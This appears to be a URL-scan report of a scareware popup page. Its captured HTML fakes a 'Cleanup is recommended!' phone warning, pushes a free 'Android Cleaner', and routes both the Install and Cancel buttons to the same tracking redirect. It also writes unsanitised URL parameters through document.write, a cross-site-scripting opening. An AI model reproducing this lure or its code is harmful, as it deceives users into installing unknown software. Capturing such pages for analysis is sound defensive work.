https://ggfiveland.com/

Submitted URL:
https://ggfiveland.com
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 9 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
0object
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
containsfunction
getURLParameterfunction
installClickedfunction
cancelClickedfunction
alertTextstring

Console log messages · 2 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://ggfiveland.com/logo.png
Text
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://ggfiveland.com/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Popup</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="style.css">
    <script>
    function contains(string, fragment) {
        string = string.toLowerCase();
        fragment = fragment.toLowerCase();
        return string.indexOf(fragment) !== -1;
    }

    function getURLParameter(name) {
        var result = decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || '');
        if(name.indexOf('brand') !== -1 && contains(result, 'generic')) {
            result = 'Phone'
        }
        if(name.indexOf('model') !== -1 && contains(result, 'android')) {
            result = ''
        }
        if(name.indexOf('browser') !== -1 && contains(result, 'android')) {
            result = 'Internet Browser'
        }
        return result;
    }

    function installClicked() {
        window.location.href = "https://my.toruftuiov.com/click";
    }

    function cancelClicked() {
        window.location.href = "https://my.toruftuiov.com/click";
    }
    </script>
</head>
<body>
    <div class="d-flex justify-content-center align-items-center vh-100">
        <div class="popup">
            <div class="popup-header">
                <h5 class="blink_me"><span class="text-danger"><script>document.write(getURLParameter("brand"))</script></span> Cleanup is recommended!</h5>
            </div>
            <div class="popup-body">
                <p>Your <span class="text-primary"><script>document.write(getURLParameter("brand"))</script><script>
                    document.write(getURLParameter("model"))
                    </script></span> may run slower and your battery may be draining quickly.</p>
                <p>You can clear memory and remove intrusive ads from your phone to fix this problem and speed up your <span class="text-primary"><script>document.write(getURLParameter("brand"))</script></span>.</p>
                <div class="d-flex align-items-center">
                    <img src="./logo.png" alt="Android Icon" class="icon">
                    <p class="text-center mb-0 ml-2">
                        We recommend install <strong>Android Cleaner</strong> for <b>FREE</b> to clean your <span class="text-primary"><script>document.write(getURLParameter("brand"))</script></span>! 
                    </p>
                </div>
            </div>
            <div class="popup-footer">
                <button class="btn btn-primary" onclick="installClicked()">Install</button>
                <button class="btn btn-secondary" onclick="cancelClicked()">Cancel</button>
            </div>
        </div>
    </div>
    <script>
    var alertText = "Wait!\n\nYour " + getURLParameter("brand") + " " + getURLParameter("model") + " might still be slowed down.\n\nStay on the page and install recommended app to clean your " + getURLParameter("brand") + " immediately.";
    </script>
<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8cf9d559abf8384b',t:'MTcyODQyOTMzMS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script><iframe height="1" width="1" style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;"></iframe>

</body></html>